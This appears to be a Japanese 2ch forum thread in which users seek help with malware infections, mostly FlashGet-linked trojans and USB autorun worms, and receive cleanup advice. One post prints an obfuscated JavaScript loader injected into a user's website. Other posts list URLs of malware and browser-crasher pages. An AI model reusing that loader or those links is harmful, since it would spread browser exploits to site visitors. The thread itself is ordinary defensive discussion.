それと、具体的な削除方法を教えてください。
system32から該当ファイルを削除しようとしても出来ないんです。
プロセスを終了させることも出来ません。
安全確実にリカバリ。
VirusTotal検査結果↓
ttp://www.virustotal.com/analisis/169bacc2f9dc7a98b7fe134287197a3a Startpageとかスパイウェアみたいな名前ついてるのもあるね。
初心者ではないのだろう?少し冷静になろう。
削除できないということは実行中なのだろう。
じぶんで起動していないなら自動実行されているのだろう。
だから「自動実行」するように設定されていないか確認しよう。
いろいろとアドバイスありがとうございました。
無事削除出来ました。
セーフモードから削除するという初歩的?なことを忘れていました。
何年振りかの感染だったので忘れていたようです。
ご迷惑おかけしました。
それともほとんどの山田ウィルスは対策ソフトで対策対応済みですか?
対応済み。
そのて俺なんだけど実はまだ格闘中なんだw
よく調べたらどんどんトロイが出てきて「OSインストールして一週間でなぜ・・・」
といろいろ検索してたらさっき↓を見つけた。
ttp://www.avpclub.ddns.info/discuz/thread-14859-1-1.html 実際俺はFlashGetを入れてるしソフ板のFlashGetスレでもチョロっと話しが出てたから
多分ビンゴだと思うんだけど。もうちょい調べてみる。
Dr.Web CureIt!でも落としておけば?
FlashGetは以前のバージョンでスパイウエア疑惑があったが
今もそんな噂があるのか?
自分も数ヶ月前に入れてた(使えないからすぐ消した)けど何もなかった。
たぶんビンゴですね。うちも同じ症状です。FlashGet Version 1.9.6.1073導入済。
定期的にアップされるファイルをダウンするために毎日バッチでFlashGetを動かしだしてから。
10/4 sprint.dll
10/25 dmsvct.dll
10/25 xmlpro.dll
11/7 dmserv.dll
いずれもC:\WINDOWS\system32\にあるのをNortonが発見、検疫されました。
で、きょうカスペルスキー オンラインスキャナかけたらtaskmagr.exe見つけました。
ご丁寧にほかのwindowsシステムファイルと日時あわせてあります。
状況証拠だけで、クロと決まったわけではありませんが、疑わざるを得ません。
バッチ機能、便利だったんですが残念ですね。気持ち悪いのでOSごと再導入します。
ttp://internet.watch.impress.co.jp/cda/news/2005/01/11/6001.html この記事にあるようにwmvを再生しようとしたら
メディア使用権限取得しますってなって
UPDATE.3397ダウンロード
インストールしたらスカイプにてなぞの英語文章が勝手に書き込まれるように
なったんだけど他になった人いる?
ttp://internet.watch.impress.co.jp/cda/news/2005/01/11/6001.html この記事にあるようにwmvを再生しようとしたら
メディア使用権限取得しますってなって
UPDATE.3397ダウンロード
インストールしたらスカイプにてなぞの英語文章が勝手に書き込まれるように
なったんだけど他になった人いる?
127〜の下の行に::1と書かれています。これはウィルスでしょうか?それとも、問題ありませんか?
割れ厨に教えることは何もありません。
ここを参考
ttp://www.geocities.jp/yamada_guard_member/ 勝手に割れ厨って決めつけるなよwお前と違うんだからww
P2P(Winny、Share、etc.)ウイルス(キンタマ、山田、原田、etc.)は板違い。移動しろ。
P2P以外(アップローダ、etc.)で踏んだとしても移動しろ。
Download
ttp://changi.2ch.net/download/
キンタマ、山田、ニュイルスなどでスレ探せ。
マウスオーバーとか移動させたりしただけで感染しますか?
thx
アンチウイルスとアンチスパイウェアを入れたいのですが、
オススメがあれば教えてください。
【使用ブラウザ】 Internet Explorer 6
HDD内をいろいろ見てたら
「TEMP」の中にIE5のデータが残ってるみたいなんですが
これって消去しても問題あにでしょうか?
というか、「TEMP」の中のファイルを全部消しちゃっても大丈夫でしょうか?
父のフラッシュメモリを借りてそこに曲を入れてやろうと思い、恥ずかしながらp2pソフトで曲をダウンロードしました
wmpで再生しようとすると、mp3の形式が違う云々と出てきたのですが、アイコンがmp3のものだったので無視してしまいましたところ
急にIEが開きmp3.exeという名のダウン窓が出てきたのでダウンロードせず閉じたのですが
この時点でウイルスには感染しないのでしょうか
父のフラッシュメモリを挿したままのことだったので
父がまだ仕事をしており、父のPCの情報が漏洩しないかとても不安です
携帯からで変な文かと思いますが宜しくお願いします
テンプレ嫁
ここはそういう質問スレじゃないから
すいませんでした
確かにここ何日かにFlashget入れてたな
うーんこれさえなければ悪いソフトじゃないんだが
ノートン先生が無反応なとこ見るとウィルスではないんだろうか
でも名前がめっちゃウィルスっぽい
ひょっとして
Trojan.Generic.1007377ってどんなウィルスなんだ?
Bitdeffenderを使って調べたところ見つけたんだが、ググっても出てこない。
BitdeffenderでなくてBitdefenderだった
検出されたファイルをVirusTotalに上げて他社の検出名でググってみたら?
同意
Genericだから、ヒューリの可能性が高いし
以下、検出結果。
AntiVir 7.9.0.31 TR/Crypt.XPACK.Gen
Avast 4.8.1281.0 Win32:Trojan-gen {Other}
AVG 8.0.0.199 SHeur.CDNZ
BitDefender 7.2 Trojan.Generic.1007377
CAT-QuickHeal 10.00 (Suspicious) - DNAScan
eSafe 7.0.17.0 Suspicious File
Ikarus T3.1.1.45.0 Trojan.Crypt.XPACK
GData 19 Trojan.Generic.1007377
K7AntiVirus 7.10.526 Trojan.Win32.Malware.1
McAfee 5435 Generic.dx
Norman 5.80.02 W32/Malware.EEGT
Panda 9.0.0.4 spicious file
SecureWeb-Gateway 6.7.6 Trojan.Crypt.XPACK.Gen
Sophos 4.35.0 Mal/EncPk-CR
Sunbelt 3.1.1801.2 VIPRE.Suspicious
TrendMicro 8.700.0.1004 PAK_Generic.001
他は検出していない。
これってウィルスなんだろうか?
かなり見づらくなってるから再度。
AntiVir 7.9.0.31 TR/Crypt.XPACK.Gen
Avast 4.8.1281.0 Win32:Trojan-gen {Other}
AVG 8.0.0.199 SHeur.CDNZ
BitDefender 7.2 Trojan.Generic.1007377
CAT-QuickHeal 10.00 (Suspicious) - DNAScan
eSafe 7.0.17.0 Suspicious File
Ikarus T3.1.1.45.0 Trojan.Crypt.XPACK
GData 19 Trojan.Generic.1007377
K7AntiVirus 7.10.526 Trojan.Win32.Malware.1
McAfee 5435 Generic.dx
Norman 5.80.02 W32/Malware.EEGT
Panda 9.0.0.4 spicious file
SecureWeb-Gateway 6.7.6 Trojan.Crypt.XPACK.Gen
Sophos 4.35.0 Mal/EncPk-CR
Sunbelt 3.1.1801.2 VIPRE.Suspicious
TrendMicro 8.700.0.1004 PAK_Generic.001
ベンダにファイルを提出すれば検査結果を教えてくれるよ。
ベンダに提出してみます。
スクリプトファイルが見つかりませんって…
対処はできたんですが、このウィルスがどんなものなのかググってもわかりません。
AVGの指示通り処理すれば大丈夫ですかね?
AVGスレで聞けば?
genericでぐぐれうんこ
あんな会社目障りなので無くなってほしいんです
会社のPCとかに潜り込んで目茶苦茶にしたいんですが出来ませんかねぇ
その程度の頭じゃ無理
常接なんですが、ヤケにDLに時間のかかるメールを受信した後、
PCを再起動したらIPアドレスの確立と認証ができなくなっていました。
ハード的にはLANを認識しているみたいです。
ttp://ime.nu/u.cruze3.cn/ihhh.html トロイの木馬っつーんだけどほんと?
FlashPlayerの脆弱性を使うトロイだな。
9.0.124未満ならあぼん。
>9.0.124未満ならあぼん。
そうなんだ。
つーか2chのあちこちの板にしかけられててこわひ。。
tp://u.cruze3.cn/office.htm
あとこれもついてきた。
2ch開くだけでなんでこんなウィルスついてくんの?
こえー。
ttp://www.aguse.jp/?m=w&url=http%3A%2F%2Fu.cruze3.cn%2Fihhh.html&x=73&y=5 検出されたマルウェアの詳細
ttp://www.f-secure.co.jp/v-descs/v-descs3/Exploit_JS_RealPlr.T.htm URL直に貼るな粕。
板開いてもそんなの無いぞ。
ブラウザのキャッシュ壊れてんじゃね?
www.proxylist.sakura.ne.jp
これ開いたらだった
ごめん
男性俳優板じゃなかった。スマソ
無料でウィルス検索できるサイト教えてください。
パソコンまだなれてなくて・・
メールを送ったらおかしくなったっていわれてウィルスかな?と思って
なんでアンチウイルスソフト入れないの?
馬鹿なの?
ノートンいれます。
ほらよ
ttp://pc11.2ch.net/test/read.cgi/sec/1223797859/l50
ttp://ime.nu/jp.youtube.com/watch?v=YImAqU2zAQc ttp://ime.nu/jp.youtube.com/watch?v=uP4zK7m4Cyc 02/18 ttp://ime.nu/jp.youtube.com/watch?v=4cHbJW9gzp4 03/18 ttp://ime.nu/jp.youtube.com/watch?v=PAjrcPtmduA 04/18 ttp://ime.nu/jp.youtube.com/watch?v=8DpSuTjCCrI 05/18 ttp://ime.nu/jp.youtube.com/watch?v=3RYisOil36o 06/18 2時間目
ttp://ime.nu/jp.youtube.com/watch?v=gQzKzHnT0us 07/18 ttp://ime.nu/jp.youtube.com/watch?v=RGtk9TTl8kg 08/18 ttp://ime.nu/jp.youtube.com/watch?v=HOA0sXW06Nw 09/18 ttp://ime.nu/jp.youtube.com/watch?v=E9fex2t3Pc4 10/18 ttp://ime.nu/jp.youtube.com/watch?v=3x8xLaSKx-U 11/18 ttp://ime.nu/jp.youtube.com/watch?v=rLLIQsb-RnM 12/18 3時間目
ttp://ime.nu/jp.youtube.com/watch?v=PahmTsltQL8 13/18 ttp://ime.nu/jp.youtube.com/watch?v=FAwe1XnrbBU 14/18 ttp://ime.nu/jp.youtube.com/watch?v=NRIwYTMhGJM 15/18 ttp://ime.nu/jp.youtube.com/watch?v=n9bNXh5yBew 16/18 ttp://ime.nu/jp.youtube.com/watch?v=Z6Cujkj8SGk 17/18 ttp://ime.nu/jp.youtube.com/watch?v=-2HTuEiNpT4 18/18 つまんねー
【使用ブラウザ】 『IE6』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】 『ウィルスセキュリティZero』
スパイウェア・ボット対策ソフト 『無』
【回線の種類・ルータの有無】 『ADSL マンション』
【具体的な症状】
突然しねしね団Flashが再生される。
DLした覚えはないです。
画面が閉じれない
【過程と措置】強制終了→起動→ウイルス検査
【その他】 海外赴任(インドネシア)の日本人です。
突然フラッシュが「死ね死ね 日本人」と始まり
身の危険も感じております。恨みを買われる覚えもあります。
どうかアドバイスお願い致します。
セキュ質で回答が得られなかったとはいえ、マルチするのは良くありませんよ。
焦らずじっくり待ってみましょ。
ttp://ime.nu/koideai.com/up/src/up9795.png アドレスはPCの状態の画像です
検索したけどよくわかりません・・・
バスターで反応しなかったからウィルスじゃないのかな
このツールバーがサイトまわってたら知らないうちに入ってて
アンインストールしようとしても変なサイトに飛ばされそうになって
恐ろしくて途中で中断してしまいます
詳しいこと知ってる人これが一体何なのか教えてください・・・;
普通にアインストールしても大丈夫じゃない?
どっかにのサイトに飛ばされるのが嫌なら
FWの方でアンインストールする時だけIEのネットワーク接続を遮断すればいいし。
まぁ、これに懲りたらブラウザを変えることですな。
ウィルス関係ではないんですね
それが聞けただけでも安心できます!
とりあえず消してきます
しかも中国語とかのラップ。気持ち悪いです。
これはウィルスですか?
安心して寝な
勝手にieがコッソリ立ち上がる奴だろ?俺も同様な症状だ
極論だがieをアンインストールしてFirefoxらへんを使えば一応解決するとは思うが・・・
ウイルス対策ソフトの対応待ちか?
俺も同症状だ。
IEをアンインストールで解決するの?
たぶん無意味かと思うけど、
音楽が始まったらタスクマネージャを起動させて、怪しいプロセスが動いてないか確認してみて。
Anvir Task Manager Freeを使って、スタートアップサービスプロセスの怪しいものを全て
Virustotalに投げてみれば?
ちなみに最近Languageに日本語も追加された(多少文字化けあり)。
ttp://ime.nu/www.anvir.com/ 【セキュリティソフトと年式】 ウイルスバスター2009
【スパイウェア対策ソフト】 同上
【回線の種類・ルータの有無】 ADSL ルーター有
【具体的な症状】
手動検索を先日かけたところ、『TROJ_MESOUM.AE』というウイルスに感染していると言う通知を受け、隔離したのですが
隔離フォルダから駆除を試したところ、駆除ができませんでした。
削除していいものかよくわからないので、感染していたファイル名を検索していたらこちらを拝見させていただいたので
相談したくて書き込みをさせていただきました。
どうしたらよいのでしょうか?
感染したファイルは
C\WINDOWS\system32\msGDl1.dllです
よろしくお願いいたします。
みなさん、親切にありがとうございます。
音楽が流れてもIEが勝手に起動とかはしてないです。
でも、タスクマネージャーのプロセスを確認したら、IEが動いてました。
(画面上では起動されてません)
そしてCPU稼動率が100%になってました。
みなさんに教えてもらったことを試してみますね!
また結果報告に来ます。
ちなみに、音楽はかからない時もあります。
急にかかったり、繰り返しかかったり、一度で終わる時もあります。
これは最近流行のウィルスだったりします?
一応、USBの中のそのフォルダとファイルは削除してPCはシステムの復元をしました
するべき対処として他になにかするべきことはありますか?
OS初期化したほうがいいでしょうか?
USBによる自動実行ウィルス(USBワーム)でしょうけど、ウィルス対策
ソフトが検知したので、少なくともそのUSBワーム本体の実行前に防御して
くれてるはずです。
ただし、可能性は低いですが、防御が攻撃の自動実行司令ファイル
「autorun.inf」読み込み後でそのUSBワーム本体実行前になされた場合で、
しかも、そのUSBワーム本体以外にウィルス対策ソフトに未反応の別の
ウィルスや攻撃コード等が他にあった場合にはウィルス対策ソフトが
防ぎきれてない事があります。
しかし、その場合でも、システムの復元したので、削除もしくは休眠状態
になってるはずなので、そういう場合でも一応は大丈夫でしょう。
ただし、システムの復元前にネット接続してた場合には、ウィルス対策
ソフト未対応の別のウィルスや攻撃コードが他にあった場合に備えて
パスワード変更を推奨します。また、システムの復元の感染後の復元
ポイントにはUSBワームが含まれているので、システムの復元を
一旦無効にして、その後、再度有効にしてください。(方法が
わからない場合は自分で調べてください。)
尚、そのパソコンに重要機密とか大金のからむパスワードとか流出すると
人生破滅するような情報があれば、万が一を考えて自己責任でリカバリ
するか否かを考慮してください。
また、USBワームの感染経路も調べる事を推奨します。
今後の事を考えて自動再生をオフにされる事を推奨します。
ttp://ime.nu/windowshelp.microsoft.com/Windows/ja-JP/Help/40f23376-1351-49d5-8d48-5c05d35f2ac81041.mspx ありがとうございます。
システムの復元をしたところ今度はwindowsがまともに起動しなくなりました。
とりあえず復元前に戻しましたが、もうリカバリしようかと思います。
リアルタイム検索つけてるとBeckyが繋がらなくなったぜ
氏ね
受信メール検索
送信メール検索
を切ったらOKになった
氏ね
その後の状況はどうですか。
同じ症状が出ました。
最近いれたflashgetのせいかなって思っていますが…
>162さんはいれてないですか?
さんと同じく自分もその症状が出た。
最近いれたflashgetのせいかなって思っていますが…
さんはいれてないですか?
2時間おきくらいに出て困っています
セキュリティ的には防いで問題ないそうですが、そのたびネット接続が途切れるので
何か改善策はありませんか?
ttp://pc11.2ch.net/test/read.cgi/sec/1225537809/784
784 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/12/05(金) 01:04:18
最近MS02-039_SQL_SERVER_RESOLUTION_EXPLOITというウイルスを緊急ブロックしましたという警告が
2時間おきくらいに出て困っています
セキュリティ的には防いで問題ないそうですが、そのたびネット接続が途切れるので
何か改善策はありませんか?
報告が遅くなりすみませんでした。
IEを削除し、再インストールしました。
その後、2日経っていますが音楽は鳴らなくなりました!
みなさんありがとうございました!
脅威の名称: (D)W32/Patcher
状態:(E) 1025
パソコンを使っていたらこのようなメッセージが表示されました。
グーグルで調べても詳しいことはよく分かりません。
このウイルスは、一体どのような性質を持っているのか、
また、どれくらい危険なウイルスなのかを教えていただけないでしょうか。
お願いします。
使っているセキュリティーソフトはマカフィーです。
最近行った作業は、
SpywareBlasterやRPGツクールの無料ゲームとランタイムをダウンロードです。
それってサウンドがいじられてるだけじゃないの?
Windowsの開始時の音をそのWAVだかMP3だかにされてるとか
ドライブ全部にあるんですけど。
162です。
報告ありがとうございます。
IE8削除してIE7に戻してみました。
暫く様子をみてみます。
162です。
flashgetはかなり前から入れてますから関係無いと思います。
【使用セキュリティソフトとバージョン】 「ウィルスバスター2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されてます」
【スパイウェア対策ソフト】 「Spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「されてます」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
C:WINDOWS\system32\taskmagr.exe
さきほどPCを立ち上げたところ、上記のファイルから
TROJ_AGENT_APXというトロイが見つかりました、と表示され
ウィルスバスターで隔離しましたが、トレンドマイクロにも上記トロイの情報は無く
駆除ができません。
どのようなウィルスかもわからず不安です。今後どのように対処すべきでしょうか?
トレンドマイクロの検出名はトレンドマイクロにしかわからんだろ。
バスタースレで。
隔離できてるなら問題ないのでは?
返答有難うございます。
以前からいれられてるんですね。
flashget入れてから頻繁にウイルスが見つかったもので…
なにやらflashgetを起動させると頻繁に中国のサイトにアクセスしていたりしたので。
その中国のサイトを教えてくださいな。
あ、頭のhtは抜いて。
いますぐアンインストールしろよ
中華製のソフトは使わないことだな
詳しくは分かりませんが、
PeerGuardian2で動向を監視したところ、
China IP
China Education and Research Network
fake emule servers
(Spam) ServerBeach
等が頻繁にブロックされていました。
尚、flashgetを終了すると↑へのアクセスは止まりました。
ttp://www.shareedge.com/spywareguide/product_show.php?id=1176 自分でもすぐ調べては見たのですが、
やはりスパイウェア仕込んでることで有名みたいですね。
なにか、いつかのバージョンから無くなったとか書いてあったのですが…
VectorでダウンロードしたFlashGet1.9.6です。
【使用OS】 「Xp SP2」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「AVG Free 8.0」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新されている」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「無」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「(1)ファイルをコピーしようとしたら、次のメッセージが表示された
アクセスしたファイルは感染しています。
ファイル名:C\System Volume Information\_restore{667B7FC2-A2DB-4c51-9B6c-1A4ECAE5387C}\RP295\A0038262.exe
脅威名:トロイの木馬 PSW.OnlineGames.2.S
オープン時に検出されました
処理名:C\WINDOWS\System32\svchost.exe
処理ID:1320
(2)スキャンしたら、
a.上記ファイル名の最後が次のものが5件表示され、
A0038268.exe 1件
A0038262.exe 3件
A0039185.exe 1件
b.その後、次のメッセージが表示された
D:\System Volume Information\_restore\_restore{667B7FC2-A2DB-4C51-9B6C-1A4ECAE5387C}\RP295\A0038211.exe
c.最後に、
検出された感染 66
除去または修復された感染オブジェクト 66
警告数 70
その他 0
SHR autorun.inf SHR f.exeが表示される。
(4)フォルダオプションで、「すべてのファイルとフォルダを表示する」にチェックして
[適用]→[OK]をした後、フォルダオプションを確認すると
「隠しファイルおよび隠しフォルダを表示しない」に変わっている。
(5)マイコンピュータでハードディスクアイコンをダブルクリックすると
何で開くか聞いてくる。
(6)外付けのポータブルディスク3台も感染している模様。」
B.質問
1.どういうウィルスに感染しているのでしょうか?
(1)1種類なのか複数なのか分かりません。
(2)PSW.OnlineGames.xxxというのはあるのですが、
PSW.OnlineGames.2.Sというのは見つかりません。
2.対策は、どうすれば良いのでしょうか?
宜しくお願いします。
USBなんかを通して感染を広めるウイルスとネトゲのパスなんかを盗むものに感染してる
両方質が悪いしばっちし感染してるからすぐリカバリーしろ
ttp://mm113.blog49.fc2.com/blog-entry-14.html ttp://www.cyber-concierge.co.jp/pc_tama/other/revo.html レスありがとうございます。
ttp://www.cyber-concierge.co.jp/pc_tama/other/revo.html を、やってみます。
次の2つの方法がネットに書かれていたのですが、
このウィルスの対策としては、どちらが良いのでしょうか?
(1)グループポリシーの設定を変える
[ファイル名を指定して実行]→gpedit.msc入力→[コンピュータの構成]
→[管理用テンプレート]→[システム]→[自動再生機能をオフにする]
→[プロパティ]→[自動再生機能をオフにする]→[適用]→[OK]
(2)レジストリを変える
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT
\CurrentVersion\IniFileMapping\Autorun.inf]
@="@SYS:DoesNotExist"
宜しくお願いします。
どちらもやってることは同じだと思うけど
(1)の方をお勧めしておく
レスありがとうございます。
【MUの状態】「最新」
【使用セキュリティソフトとバージョン】「光回線でデフォでついてきたNTT西日本セキュリティ対策ツールver15」
【最新か】「最新」
【スパイウェア対策ソフトと状態】「同上」
【スキャンの結果何が検索されたか】「このソフトだと何も検索されない」
だった訳ですが(続く)
ノートンsecurity scanによると
【検出されたウイルス】「Unix.penguin
感染場所はJane styleの生活板のログ
JS.Windowbomb
感染場所はJane styleのどこか」
専ブラ使ってるのでとは違うのでしょうか?
無償のスキャナで除去不能とか言われるし常駐のソフトでは検出されないしいったいどうしたらという感じです
専ブラにも反応するんですか?
やっかいですね…
使ってないしノートン先生はアンインスコします
ありがとうございました
W32/Patcher
調べても情報が出てきません。
どなたか駆除方法をご存知ありませんか?
【Microsoft Update(MU)の状態】 「最新」
先ほど自動更新でアップデートしたら
悪意のあるソフトウェアの削除ツールで、
TrojanDropper:Win32/Renos.N
なるものが削除されました。
ぐぐても、どんなウィルスなのかいまいちわかりません
これはどんなウィルスなんですか?
よろしくお願いします。
a0030828.exe
バスター2009でこの二つがウイルスだって出た
3.0mod3-3.54-setup.exeがWINMXのパッチなのは分かったけど
a0030828.exeが何なのかわからん?
誰か教えてくれ
sens.dllでググれ
パスがSystem Volume Information以下だったら、システムの復元のバックアップファイル。
Renosでググれ。
誤検出でなければ、sens.dllが改変されてる。
セキュリティソフトで修復出来なかったら、早くリカバリした方がいいよ。
それくらい自分で探そうね。
dmserv.dll
C:\WINDOWS\system32\の中で
隔離削除できないため困っています。
セーフモードでもだめでした、何かOS入れ直さないで
修復できる方法ありませんか?
案内レス
企業用PCでしょうか?
もしそうならシステム管理者にご報告を
聞こえなくなくったからと言って安心できませんよ。僕も12/4日くらいに取りつかれ、英語交じりの中国語のラジオ放送みたいなのと、クリック音が連続して聞こえる現象がありましたが、断続的で3日ほ現象が無かったのです。どうも夜8時頃に起動すればそうした現象が
出て、他の時間帯ではそうではなありませんでした。Flash getは直ちに削除しましたが、新しすぎるためなのかウィルスセキュリティでは検出できず、いろいろな体験版で対処中です。
THX
System Volume Informationだから
システムの復元のバックアップファイルなのか?
なんでウイルス扱いなんだ?
隔離してるって出てるけどどうなるんだろう?
更新でソフトを新しく入れるとこんなのばっかり・・・
s2.com
ってウィルスかな? ドライブ全てにいるのだが、前からあったかな…
ググッテモよく分からないし…ソース頼む
その後DドライブにRECYCLERとSystem Volume Informationが出てきたんだけど、これって何で?
今までは「全てのフォルダを表示する」にしてても表示されなかったのに。
ttp://pc11.2ch.net/test/read.cgi/sec/1224511070/l50
OSがファイルをつかんでしまっているためだと思います。
マイコンピュータ右クリック→管理→サービスとアプリケーション
→サービス
サービスの中に怪しい文字列(意味のない文字列)があったら
それをダブルクリック、スタートアップの種類を「無効」にして一度パソコンを再起動、
それからもう一度system32フォルダをコーポレートエディションでスキャン、
これでうちの会社はできましたよ。
一度やってみてください。
OSの復元はできませんが最悪再セットアップすればいい話なので。
ためしにウイルスに感染できるホームページとかないですか?
当然バックアップしてから挑みます。
自分の防御力を調べてみたいって人少ないのかなあ。
ttp://ime.nu/jp.youtube.com/watch?v=3atmWmWCwlw まだあるかわかんないけど。
リンクはようつべ
gog いってみたけど今は配布してないようです。
1. //www.hackpalace.com/virii/makers/ (ウィルス)
2. //ip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm (ウィルスJS_PETCH.A:セキュリティホールを突いたWMP破壊スクリプト)
3. //easyweb.easynet.co.uk/~hiros/**** (****以降はウイルス名:ウイルス)
4. //www2.strangeworld.org/uedakana/sahra****.*** (****は番号違い、拡張子違いなど:ブラクラ&ウイルス:HTML_SUAR.)
5. //amilala.blogspot.com (ウイルスJS_AMILALA.A作成者のサイト。有害なスクリプトが仕掛けられる可能性あり)
6. //www.kogalu.com/sou/girls/index2.htm (通常はエロサイトだがブラクラ&ウイルスの場合あり)
7. //raus.de/crashme/ (ブラクラ&ウイルス)
8. //www.albinoblacksheep.com/flash/you.html (ブラクラ:Windowオープン/ゾンビ ウィンドウ/無限JavaScriptループ)
9. //www.albinoblacksheep.com/flash/open.html (8と同じです)
10. //www.youareanidiot.org/ (8と同じです)
11. //cfi.hyo-ka.net/kiki01.htm(ブラクラ:Windowオープン。ドクロの壁紙)
みんなウイルスの挙動紹介の安全なHPですね。
サイト持ちなんですが、ファイル上げてから暫くするとソースに
よくわからない記述が追加されてしまいます。
サイト感染してるんじゃないですかって、閲覧者からの報告があって
調べてみたら見つけました。
とりあえずローカルファイルには問題ないっぽいので、
サーバーのファイルを全て消去して上げなおしました。
昨日上げなおしてソースチェックしたらなかったので安心してたら、
今日ソース見たときには追加されてました。
今、また上げなおして様子見中なんですが、
また追加されたらどう対処するべきかわかりません。
アドバイスお願いします。
↓がその記述です。
{ function m49435c6beacc4(){var m49435c6beb495=16;return m49435c6beb495;}
return (parseInt(m49435c6bea4f4,m49435c6beacc4()));}
function m49435c6bebc69(m49435c6bec437){ function m49435c6bedba9(){return 2;}
var m49435c6becc07='';m49435c6beeb49=String.fromCharCode;
for(m49435c6bed3d8=0;m49435c6bed3d8<m49435c6bec437.length;m49435c6bed3d8+=m49435c6bedba9())
{ m49435c6becc07+=(m49435c6beeb49(c102916999516m49435c6be9d24(m49435c6bec437.substr(m49435c6bed3d8,m49435c6bedba9()))));}return m49435c6becc07;}
m49435c6bef31b='3C7'+zc6+'3637'+zc6+'2697'+zc6+'07'+zc6+'43E6
96628216D7'+zc6+'96961297'+zc6+'B646F637'+zc6+'56D656E7'+zc6+
'42E7'+zc6+'7'+zc6+'7'+zc6+'2697'+zc6+'465287'+zc6+'56E657'+z
c6+'363617'+zc6+'065282027'+zc6+'2533632536392536362537'+zc6+
'322536312536642536352532302536652536312536642536352533642536
332533312533302532302537'+zc6+'332537'+zc6+'32253633253364253
237'+zc6+'2536382537'+zc6+'342537'+zc6+'342537'+zc6+'30253361
253266253266253637'+zc6+'253666253637'+zc6+'25366625333225366
42536352532652536652536352537'+zc6+'34253266253265253637'+zc6
+'2536662532662536332536382536352536332536622532652536382537'
+zc6+'34253664253663253366253237'+zc6+'2532622534642536312537
'+zc6+'342536382532652537'+zc6+'322536662537'+zc6+'3525366525
36342532382534642536312537'+zc6+'342536382532652537'+zc6+'322
5363125366525363425366625366425323825323925326125333225333225
3334253332253337'+zc6+'253239253262253237'+zc6+'253332253337'
+zc6+'253237'+zc6+'2532302537'+zc6+'37'+zc6+'2536392536342537
'+zc6+'342536382533642533342533312532302536382536352536392536
37'+zc6+'2536382537'+zc6+'34253364253335253334253337'+zc6+'25
32302537'+zc6+'332537'+zc6+'342537'+zc6+'39253663253635253364
253237'+zc6+'2536342536392537'+zc6+'332537'+zc6+'302536632536
312537'+zc6+'39253361253230253665253666253665253635253237'+zc
6+'2533652533632532662536392536362537'+zc6+'32253631253664253
63525336527'+zc6+'29293B7'+zc6+'D7'+zc6+'6617'+zc6+'2206D7'+z
c6+'969613D7'+zc6+'47'+zc6+'27'+zc6+'5653B3C2F7'+zc6+'3637'+z
c6+'2697'+zc6+'07'+zc6+'43E';document.write(m49435c6bebc69
(m49435c6bef31b));</script>
貼り付けたコードの改行や不要部分を取り除いて、エディターでファイルにしてみたところ、
"JS/Obfuscated"と言う名称のトロイであることが判りましたよ。うちのMcAfee+Artemisが
検出しました。
以下のページで、"JS/Obfuscated"と言う名称で検索してみてください。ちなみにMcAfeeの
ページですが、日本語のサイトでは載っていません。USAの方で探せます。
ttp://vil.nai.com/vil/default.aspx Virus Profile: JS/Obfuscated
Risk Assessment
- Home Users: Low
- Corporate Users: Low
Date Discovered: 11/26/2008
Date Added: 11/26/2008
Origin: Unknown
Length: N/A
Type: Trojan
SubType: Script
詳細な説明が、"JS/Obfuscated.b"とかにしか有りませんが、ブラウザの脆弱性を利用する
スクリプトファイルですね。
あなたのPCが、マルウエアに感染していないのなら、サーバーがSQLインジェクション等で
攻撃されてるんでしょうね。管理者へ至急連絡しないと行けませんね。
【Microsoft Update(MU)の状態】 「不明」
【使用セキュリティソフトとバージョン】 「セキュリティ24」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新済」
【スパイウェア対策ソフト】 「Kingsoft」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「常時自動更新状態」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「uu.exe」
PCを起動するたびに一時ファイルのフォルダに複数のuu.exeに入っています
しかも対策ソフトも一時フォルダを開けないと反応せず削除しないみたい感じです
調べたところPCに別のウイルスが入っていてそれが勝手にダウンロードしているみたいです
どのような対策をすればよろしいのでしょうか?
トロイでしたか…。
PCが感染してる可能性は考えたので、ファイル上げなおす前に一通りのチェックはしました。
別のサーバーでやってるサイトは全く感染しないのでPCが問題という事はおそらくないと思ってます。
もう少しPCチェックしてやっぱり問題がないのなら管理者に連絡してみます。
感染ばっかり考えてて忘れてました。すぐ変更してみます。
ありがとうございました。
健康診断のほうに移動されました?
ログに問題は無い様です…
それともしかしてMBAMというツールも使いました?
とりあえずあちらの方の指示を優先してください。
エクスプローラですべてのファイルとフォルダを表示(隠しファイルの表示)は出来てる?
出来るならc:\windows\system32フォルダにrevo.exeやrevo0.dllとか無いか確認してみて。
もし出来なかったらウイルスが実行されてる状態。
しかも各社ウイルス対策ソフトで全く対策されていないウイルス
しました。
MalwareBytes' Anti-Malwareでしたら使いました。
ログは問題なしですか。とりあえず一安心ですが感染原因が不明ですね…。
IDとパスが漏れてたのかもしれないです。
ありがとうございます。指示を待ちます。
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast! 4.8.1296」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「手動」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「C:\WINDOWS\SYSTEM32\ils.dll」
avast! からの警告「疑わしいファイルが発見されました」
と表示されました。
削除していいのでしょうか?
ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1221445752 avast! Anti-Virus Part99
ttp://pc11.2ch.net/test/read.cgi/sec/1229273929/30-
スルーされ気味なのでこちらに書き込ませてください
OS XP
ウィルスソフト avastとspybot
更新はどちらも最近放置してたかもしれません
